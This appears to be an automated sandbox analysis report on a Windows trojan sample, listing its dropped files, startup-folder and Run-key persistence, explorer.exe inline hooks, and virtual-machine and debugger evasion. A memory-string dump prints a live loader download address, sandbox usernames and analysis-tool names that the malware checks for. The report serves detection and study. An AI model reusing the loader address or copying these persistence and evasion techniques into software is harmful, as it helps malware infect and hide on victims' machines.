Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\_hashlib.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-sysinfo-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-crt-stdio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\_bz2.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-crt-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-errorhandling-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-memory-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-crt-convert-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\unicodedata.pyd Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\VCRUNTIME140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-debug-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\libcrypto-1_1.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-handle-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-timezone-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-crt-runtime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-rtlsupport-l1-1-0.dll Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-file-l2-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-file-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\python38.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-processthreads-l1-1-1.dll Jump to dropped file
Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MicrosoftEdgeUpdate.lnk Jump to behavior
Stores files to the Windows start menu directory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MicrosoftEdgeUpdate.lnk Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Services Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Services Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Changes the view of files in windows explorer (hidden files and folders)
Source: C:\Windows\System32\svchost.exe Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced Hidden Jump to behavior
Found hidden mapped module (file has been removed from disk)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\TH2197.TMP
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\TH457A.TMP
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\TH6566.TMP
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\TH8552.TMP
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessInternalW new code: 0xE9 0x90 0x00 0x07 0x75 0x5F
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF9429EC LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 0_2_00007FF6CF9429EC
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Contain functionality to detect virtual machines
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: vmware.exe vmware-vmx.exe vboxservice.exe vboxservice.exe vboxtray.exe 0_2_00007FF6CF943C40
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: vmware.exe vmware-vmx.exe vboxservice.exe vboxservice.exe vboxtray.exe 4_2_00007FF6BCCA3C40
Source: C:\Windows\System32\svchost.exe Code function: vmware.exe vmware-vmx.exe vboxservice.exe vboxservice.exe vboxtray.exe 5_2_00007FF78FA63C40
Source: C:\Windows\System32\svchost.exe Code function: vmware.exe vmware-vmx.exe vboxservice.exe vboxservice.exe vboxtray.exe 9_2_00007FF7A34B3C40
Source: C:\Windows\System32\svchost.exe Code function: vmware.exe vmware-vmx.exe vboxservice.exe vboxservice.exe vboxtray.exe 13_2_00007FF67F553C40
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: svchost.exe Binary or memory string: PROCESSHACKER.EXE
Source: svchost.exe Binary or memory string: X64DBG.EXE
Source: SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Binary or memory string: INVALID STRING POSITIONSTRING TOO LONGWCSCPYMSVCRT.DLLWCSCATWCSCMPWCSNCPYWCSLENSTRLENREALLOCFREEWCSSTRCLOSEHANDLEKERNEL32.DLLCREATEFILEWFREELIBRARYMOVEFILEWGETFILESIZEEXGETWINDOWSDIRECTORYAGETVOLUMEINFORMATIONAGETTICKCOUNTWSPRINTFWUSER32.DLLWSPRINTFAVIRTUALALLOCREADFILESLEEPVIRTUALFREESETFILEPOINTERCREATEDIRECTORYWFINDFIRSTFILEWFINDNEXTFILEWFINDCLOSECOPYFILEWWRITEFILEGETSYSTEMDIRECTORYWEXITPROCESSCREATEPROCESSWSHELLEXECUTEWSHELL32.DLLGETMODULEFILENAMEWGETSHORTPATHNAMEWGETENVIRONMENTVARIABLEWINTERNETOPENWWININET.DLLINTERNETOPENURLWHTTPQUERYINFOAINTERNETREADFILEINTERNETCONNECTWHTTPOPENREQUESTWHTTPSENDREQUESTAINTERNETCLOSEHANDLESHGETFOLDERPATHWSHGETFOLDERPATHASHGETKNOWNFOLDERPATHPATHISURLWSHLWAPI.DLLPATHCOMBINEWPATHFINDFILENAMEWREGDELETEKEYWADVAPI32.DLLREGOPENKEYEXAREGSETVALUEEXAREGCLOSEKEYOPENPROCESSTOKENGETTOKENINFORMATIONADJUSTTOKENPRIVILEGESGETUSERNAMEWLOOKUPPRIVILEGEVALUEACOUNINITIALIZEOLE32.DLLCOCREATEINSTANCECOINITIALIZEMESSAGEBOXAMOZILLA/5.0 (WINDOWS NT 10.0; WIN64; X64) APPLEWEBKIT/537.36 (KHTML, LIKE GECKO) CHROME/129.0.0.0 SAFARI/537.3SEDEBUGPRIVILEGEVECTOR<T> TOO LONGREFLECTIVELOADERSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STARTUPAPPROVED\RUNSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STARTUPAPPROVED\STARTUPFOLDERPROCESSHACKER.EXEPROCEXP.EXEPROCEXP64.EXETOTALCMD.EXEX64DBG.EXEHTTP://176.111.174.140/API/LOADER.BINVMWARE.EXEVMWARE-VMX.EXEVBOXSERVICE.EXEVBOXTRAY.EXESVCHOST.EXEMICROSOFTEDGEUPDATEBAD LOCALE NAMEIOS_BASE::BADBIT SETIOS_BASE::FAILBIT SETIOS_BASE::EOFBIT SET%SYSTEMROOT%\SYSTEM32\SVCHOST.EXEGEORGEABBYDARREL JONESJOHNJOHN ZALINSKYJOHN DOESHCTAGA3RMUV0U6479BOGY8WJXNBZWALKEROXYT3LZGGZMKT3WOBOWWAWUH6PNJAAKW.QSMDVVCP06AAY3MLFANLLPJPQLAVKFB0LT07HV8BUT5BISCZAFGXGD9FQ4IV8FRANKANNAWDAGUTILITYACCOUNTWDAGUTILITYACCOUNTHAL9THVIRUSMALWARESANDBOXSAMPLECURRENTUSEREMILYHAPUBWSHONG LEEIT-ADMINJOHNSONMILLERMILOZSMICROSOFTSAND BOXMALTESTPAUL JONESVMRAYDIAMOTRIX{%08LX%04LX%LU}ZBI\.EXE.LNK\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCEDHIDDENSERVICESUNKNOWN.FIREFOX.EXEEXPLORER.EXE\MRT.EXE\MOZILLA\FIREFOX\PROFILES\*RELEASE\DRIVERS\ETC\HOSTSVIRUSTOTAL
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Memory allocated: D90000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Memory allocated: 28C0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Memory allocated: 48C0000 memory reserve | memory write watch Jump to behavior
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Windows\explorer.exe Code function: 3_2_08B721B0 CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,Thread32Next,CloseHandle,OpenThread,SuspendThread,GetThreadContext,SetThreadContext,CloseHandle, 3_2_08B721B0
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\svchost.exe Thread delayed: delay time: 500000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\svchost.exe Window / User API: threadDelayed 7531 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 9688 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 626 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 605 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Window / User API: threadDelayed 1328 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Window / User API: threadDelayed 3629 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-processenvironment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-crt-process-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-profile-l1-1-0.dll Jump to dropped file
